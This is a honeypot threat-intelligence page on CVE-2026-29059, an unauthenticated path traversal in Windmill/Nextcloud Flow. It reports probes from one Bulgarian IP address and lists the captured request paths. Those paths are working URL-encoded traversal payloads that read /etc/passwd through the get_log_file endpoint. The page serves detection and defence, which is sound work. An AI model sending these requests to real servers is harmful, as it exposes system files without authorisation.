CVE-2026-29059: Windmill/Nextcloud Flow < 1.603.3 - Unauthenticated Path Traversal

HoneyLabs honeypots recorded 4 probes matching CVE-2026-29059 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

Request paths that identify it

  • /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
  • /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc…
  • /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2144Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited41

Captured requests

  • /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
  • /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
  • /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

CVE report

CVE report

Open a specific CVE from the CVE tracker.